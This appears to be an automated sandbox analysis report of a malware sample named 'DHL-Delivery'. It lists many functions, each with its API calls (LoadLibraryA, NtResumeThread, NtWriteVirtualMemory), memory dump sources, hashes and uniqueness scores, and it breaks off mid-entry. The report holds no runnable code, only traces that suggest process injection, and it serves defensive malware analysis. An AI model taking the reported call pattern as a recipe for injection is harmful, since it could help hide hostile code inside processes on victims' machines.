                        • API String ID: 1876017897-0
                        • Opcode ID: e0f63405bd6708c9f8fb9cd65de47d49e879b9074bb0697e401ca2273943fea2
                        • Instruction ID: dc3714bfe1d8ac064c894faad16f72d2064511ce73cfa92db59c8e94f55d571a
                        • Opcode Fuzzy Hash: e0f63405bd6708c9f8fb9cd65de47d49e879b9074bb0697e401ca2273943fea2
                        • Instruction Fuzzy Hash: 97514E296CD382CDDF2D497489B43EA3262EF26628FD6425BCC32C7190D37682C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AADC1, Relevance: 1.7, APIs: 1, Instructions: 175librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 6e95549a6d158ffa960bfe3074501efdffb7bb0e1e81b0adf8bf62f9f12bf299
                        • Instruction ID: abd892519429d7b6458ef674b76afe11c7e1d101cd65816a7b9cba9b3ce1a7c6
                        • Opcode Fuzzy Hash: 6e95549a6d158ffa960bfe3074501efdffb7bb0e1e81b0adf8bf62f9f12bf299
                        • Instruction Fuzzy Hash: 94512E296CD382CDDF2D496489783EA3262AF75728FD7425BCC7287190D37686C5C643
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAD35, Relevance: 1.7, APIs: 1, Instructions: 174librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: c0cd770d3b7ed6b920ec0886ab2c65b8c6a7ab79f48f9138d85ee36eee65fd86
                        • Instruction ID: cafdf96a3b01c2a5c503404a89173b057f8109ba8c7e6205d1aac13dc58e7b4c
                        • Opcode Fuzzy Hash: c0cd770d3b7ed6b920ec0886ab2c65b8c6a7ab79f48f9138d85ee36eee65fd86
                        • Instruction Fuzzy Hash: 2951F8296CC285CDDF3D596489B83FA2272AF65328FDB421BCC7387190D36686C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAD59, Relevance: 1.7, APIs: 1, Instructions: 172librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 27f7f5966a4ae70f83e5a726a12545eb756cd241118cbcdbde68cc9330f4500f
                        • Instruction ID: 9fe170b4ab04d020ce97269707adbe039b2a8d82eb74a38615ee88dda79d836d
                        • Opcode Fuzzy Hash: 27f7f5966a4ae70f83e5a726a12545eb756cd241118cbcdbde68cc9330f4500f
                        • Instruction Fuzzy Hash: 6151EB696CC345CDDF2D596489B83FA2272AF65328FDB421BCC7387190D36685C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAD7A, Relevance: 1.7, APIs: 1, Instructions: 171librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: b4950cb0d6c2c16ca1b965fd5d74e4dbcecdf509703c49ff8281c65e95c6efa2
                        • Instruction ID: d607e7482a16987af67c603d25b2dc97b90879d31529c6e232a6bc5e26cda0bf
                        • Opcode Fuzzy Hash: b4950cb0d6c2c16ca1b965fd5d74e4dbcecdf509703c49ff8281c65e95c6efa2
                        • Instruction Fuzzy Hash: F051F8696CC385CDDF2D496489B83FA2272AF65328FDB421BCC7287190D37586C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AADA1, Relevance: 1.7, APIs: 1, Instructions: 167librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 63bd8e59d07bef6c6426b727cc5ff308c18b814963ce6104021e18555382cf5c
                        • Instruction ID: d6b1478fa244f8e83ae6f643b1088dbbd6d17f020636634a944ff4a08a35f195
                        • Opcode Fuzzy Hash: 63bd8e59d07bef6c6426b727cc5ff308c18b814963ce6104021e18555382cf5c
                        • Instruction Fuzzy Hash: 5441D9696CC385CDDF3D596489B83FA2262AF66328FDB421BCC7287190D36585C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAE0B, Relevance: 1.7, APIs: 1, Instructions: 160librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: ece64ac02aa512bac1f7f29da3c363dc4c6a1e51ebe339c2df3f9da05422052e
                        • Instruction ID: 883927d05260e72c14d10d41189edb251428b4b1abe9222f2717b2d2803f7ff2
                        • Opcode Fuzzy Hash: ece64ac02aa512bac1f7f29da3c363dc4c6a1e51ebe339c2df3f9da05422052e
                        • Instruction Fuzzy Hash: 5241EB696CC385CDDF2D496489B83FA2262AF66328FDB431BCC7287190D36586C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAEA0, Relevance: 1.7, APIs: 1, Instructions: 159librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 466e2f875f76d38692d1794222574a25d54fe23c5bff74442d0f7c3110f698e6
                        • Instruction ID: b33b2271df5b051aa8c795f7aabf7502b015e375996fad6ca523e7339bbe18a3
                        • Opcode Fuzzy Hash: 466e2f875f76d38692d1794222574a25d54fe23c5bff74442d0f7c3110f698e6
                        • Instruction Fuzzy Hash: D2410C696CD282CDDF2D596489783EA2263AF66738FC7435BCC7287190D37682C5C643
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAEE7, Relevance: 1.6, APIs: 1, Instructions: 150librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 00ee5090bf297530bed8b6c6af72cba70dc7dbee60e111786f7ffab1be078438
                        • Instruction ID: c8eadba8011d71672a268b0166318c29721632db8fa9fcbdde3dc2f79195eb06
                        • Opcode Fuzzy Hash: 00ee5090bf297530bed8b6c6af72cba70dc7dbee60e111786f7ffab1be078438
                        • Instruction Fuzzy Hash: DD411A296CD381CDDF2C596489B83EA2262AF7666CFC6425BCC3287190D36642C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAF84, Relevance: 1.6, APIs: 1, Instructions: 142librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 087a459cab911e9818ea0142e7dcfc2a191beba4ce3195ab80ec90062dd3408d
                        • Instruction ID: b7328dc73f56c64024e85fe1bb01f1056e53a6197d72ba829e7fa66c8ea2b682
                        • Opcode Fuzzy Hash: 087a459cab911e9818ea0142e7dcfc2a191beba4ce3195ab80ec90062dd3408d
                        • Instruction Fuzzy Hash: D9414B286CD391CDDF29496489B83E63263AF3662CFC6425BCC3287091D37642C5C543
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A470B, Relevance: 1.6, APIs: 1, Instructions: 140nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: cc1e398e2aca3a8733d47e342767ccd4d6eda9ce6a1d995277a9781f1355ae05
                        • Instruction ID: 639ed9e916f28a08ffcfd376876226436d9af16825079e61cb825eda68d15618
                        • Opcode Fuzzy Hash: cc1e398e2aca3a8733d47e342767ccd4d6eda9ce6a1d995277a9781f1355ae05
                        • Instruction Fuzzy Hash: A641557C7C1346AEEF281D689CF0BF9237BBF15740F994028EC9A97044C7A994D9C651
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A467A, Relevance: 1.6, APIs: 1, Instructions: 139nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 96f2b705e8e8cdf543be1bcd184fcc2b40d7fcb72d487f3392c510b0dba32db6
                        • Instruction ID: d49b1893518e7ef7b6dafc8a5dc1fc900c20bbd4440c0a1e6a78b55e8e907a8d
                        • Opcode Fuzzy Hash: 96f2b705e8e8cdf543be1bcd184fcc2b40d7fcb72d487f3392c510b0dba32db6
                        • Instruction Fuzzy Hash: BC4153797C1386AEEF285D68CCF1BE9337BBF14740F994028EC9693044C7A684D8CA91
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AAF38, Relevance: 1.6, APIs: 1, Instructions: 137librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 4f4db8c7037804b6ebd70f3d53d1814f27388663ac6b8c456ff7a2a8e414e084
                        • Instruction ID: f35dbd85823f7ae0ff414a28e99cc60ae9ead0984fa870a67e806f90d06e9aa8
                        • Opcode Fuzzy Hash: 4f4db8c7037804b6ebd70f3d53d1814f27388663ac6b8c456ff7a2a8e414e084
                        • Instruction Fuzzy Hash: 7041E9286CD285CDDF2D596489B93EA2262AF7663CFCB435BCC7287190D36682C5C943
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAF5F, Relevance: 1.6, APIs: 1, Instructions: 135librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: f7ad69b4ff93bcaadc2a36c68b7a1275e5e4d2ff03f1833f8f90653235f149a7
                        • Instruction ID: e102a30f74c1fb7d83614ff4fb3842ee777514129648fcea574dbbdce9e6f52c
                        • Opcode Fuzzy Hash: f7ad69b4ff93bcaadc2a36c68b7a1275e5e4d2ff03f1833f8f90653235f149a7
                        • Instruction Fuzzy Hash: 0641F6286CD285CDDF2D596489783EA2262AF7663CFCB435BCC72871D0D36642C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A472C, Relevance: 1.6, APIs: 1, Instructions: 130nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 98f814961d3523da4eba41bbac237f36bf1120584b1ac2326a39e6e83f4699b4
                        • Instruction ID: e3f9d5355b67f532d12c3499b4496d495533fb0eb42d88bfb946efd4422256c1
                        • Opcode Fuzzy Hash: 98f814961d3523da4eba41bbac237f36bf1120584b1ac2326a39e6e83f4699b4
                        • Instruction Fuzzy Hash: 174177787C1386AEEF296D68CCF0BF92277BF14740F994128EDA697084C7A684D5C681
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AAFC9, Relevance: 1.6, APIs: 1, Instructions: 127librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: ad03b8bc60d2910ebb4aa5ea4121a99c932bededba077d87208f8325fc7d9806
                        • Instruction ID: 3c149bf2e18d026697e6bf595b917fd55118e7d19d4aadedad109a2aa973602a
                        • Opcode Fuzzy Hash: ad03b8bc60d2910ebb4aa5ea4121a99c932bededba077d87208f8325fc7d9806
                        • Instruction Fuzzy Hash: C731E9286CD385CDDF29596489783E62262AF7663CFCB435BCC72870A0D37642C5C943
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A46D4, Relevance: 1.6, APIs: 1, Instructions: 124nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 359ac02c79593ae168eccecec13115ee93184a32a2de0abfd28ac320b055ba7a
                        • Instruction ID: 44c1aa2571fc6cb82d256e96301f3413b62e982c98376cee80aa5a2902e20e0b
                        • Opcode Fuzzy Hash: 359ac02c79593ae168eccecec13115ee93184a32a2de0abfd28ac320b055ba7a
                        • Instruction Fuzzy Hash: 4D3114787C1346AEEF296D68CCE1BF93277BF18780F994128EC9693044C7AA84D5C691
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AB085, Relevance: 1.6, APIs: 1, Instructions: 122librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 08c68995aec452ff0f95e123925aefcc01e517035db17f732267ea2fa3dbfe3a
                        • Instruction ID: 8f94b49fafffdf785818afbe1ca6473d1d1caa3da25c6e5f0c7e562c52c9813f
                        • Opcode Fuzzy Hash: 08c68995aec452ff0f95e123925aefcc01e517035db17f732267ea2fa3dbfe3a
                        • Instruction Fuzzy Hash: F1310A296CD386CDDF255974C9783D63263AF6667CFCA435AC821870A1D37642C9C543
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AAFED, Relevance: 1.6, APIs: 1, Instructions: 122nativethreadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 6d5250812147e1a34bfe41242c7ae3f744c23ca4e6570aaf788d84a9179d6935
                        • Instruction ID: 781b2d115131fc441b04c800ab7c7e025c13e77fe8b61621d3c1a9bc33615adc
                        • Opcode Fuzzy Hash: 6d5250812147e1a34bfe41242c7ae3f744c23ca4e6570aaf788d84a9179d6935
                        • Instruction Fuzzy Hash: 8B31F6286CD385CDDF29596489B93E62262AF7677CFCA435BCC72870A0D37642C5CA43
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 021AB01A, Relevance: 1.6, APIs: 1, Instructions: 119librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: a25d01caeed28974eb9d67fc05b2bbb60731b5f67da1beb77be778e08b6d7f82
                        • Instruction ID: 8b8b4475cf8ba4403b04de93de5206c5b3a6c7a7c6e8980ceb3cef422127f67a
                        • Opcode Fuzzy Hash: a25d01caeed28974eb9d67fc05b2bbb60731b5f67da1beb77be778e08b6d7f82
                        • Instruction Fuzzy Hash: CB31E6286CC385CDDF29596489783E62262AF7667CFCA435BCC72830A0D37642C5CA43
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB03A, Relevance: 1.6, APIs: 1, Instructions: 117librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 7e3b710e47cade4ebbb0fb1dc37ed045c68ad11b12ce97ed32e139ad93e868bc
                        • Instruction ID: 80fb27f412f4b2f8edf56ff0bc95ae741820362387f077e098f35ba681af925e
                        • Opcode Fuzzy Hash: 7e3b710e47cade4ebbb0fb1dc37ed045c68ad11b12ce97ed32e139ad93e868bc
                        • Instruction Fuzzy Hash: 9631E5286CD385CDDF29596489783E63262AF7673CFCA435BCC62870A0D37682C5C943
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB061, Relevance: 1.6, APIs: 1, Instructions: 116librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 261ad6a77de98019ec7a835ae5799c36b20faa76536ade2129149af9feae68a3
                        • Instruction ID: 4ca79cc6e22178890390c27ecff17f312603ac7109dc9840ac43726bd7e56246
                        • Opcode Fuzzy Hash: 261ad6a77de98019ec7a835ae5799c36b20faa76536ade2129149af9feae68a3
                        • Instruction Fuzzy Hash: DC31E8286CD385DDDE2859648A783E62263AF7663CFCB435BCC22870A0D37642C5C943
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021A4742, Relevance: 1.6, APIs: 1, Instructions: 114nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: f2775b54cce7509f82cb34c5def28b971d3f2c62b20bb5080aebf3cfc5a87665
                        • Instruction ID: e4e9e5d339a35ecb4b639d410bfb3b0b1d87750bd3d1fca0f4c674273544b7ca
                        • Opcode Fuzzy Hash: f2775b54cce7509f82cb34c5def28b971d3f2c62b20bb5080aebf3cfc5a87665
                        • Instruction Fuzzy Hash: 783145787C134AAEEF292D688CF0BF9327BBF14780F994128EC9993044C7AA84D4C741
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A4736, Relevance: 1.6, APIs: 1, Instructions: 112nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: fa1a50841a20682b4449366ee10bee7493187beb6c06ecd0a21a75b5703dbed9
                        • Instruction ID: 3a317346eb2e24691b44a07de939b1071764fcf4fd5d5ebdfd84bb359e268d8e
                        • Opcode Fuzzy Hash: fa1a50841a20682b4449366ee10bee7493187beb6c06ecd0a21a75b5703dbed9
                        • Instruction Fuzzy Hash: A431377C7C1346AEEF286D688CF0BF92277BF18780F994128EC9A93044C7AA84D5C741
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021A476E, Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,00001000,00000040,00000000,?,?,00000000,00000000,00000000), ref: 021A4827
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryVirtualWrite
                        • String ID:
                        • API String ID: 3527976591-0
                        • Opcode ID: 233d6ca0a914ca7ad569e9ef776791fbc9d74d04543b16aac27c607f9563d3c7
                        • Instruction ID: 986587753992858c9792b068093a6204f3b97acba372145cc21d925beb023b2b
                        • Opcode Fuzzy Hash: 233d6ca0a914ca7ad569e9ef776791fbc9d74d04543b16aac27c607f9563d3c7
                        • Instruction Fuzzy Hash: C53123787C1346AEEF285D648CE0BE93277BF14740F994128ED9593044C7BA84D5C751
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 021AB0CB, Relevance: 1.6, APIs: 1, Instructions: 104librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: 8e35c9c4d190be31563c38839f7b62edfe7b3e319dc2ace59e7ba84ad0aefe72
                        • Instruction ID: 04fdebc224118e070aa22458872f76a7c399c452d8402d3a1f3516474242c18a
                        • Opcode Fuzzy Hash: 8e35c9c4d190be31563c38839f7b62edfe7b3e319dc2ace59e7ba84ad0aefe72
                        • Instruction Fuzzy Hash: 0831E8286CD385CDDF28596489783E732569F6667CFDB435BCC21870A0D37642C5C903
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 021AB0E9, Relevance: 1.6, APIs: 1, Instructions: 101librarynativethreadUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtResumeThread.NTDLL ref: 021AB2CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoadResumeThread
                        • String ID:
                        • API String ID: 1876017897-0
                        • Opcode ID: fe0371869b97be281edb4c3a2f6e3c97a052f6b1e8c4389db26bc7c273591849
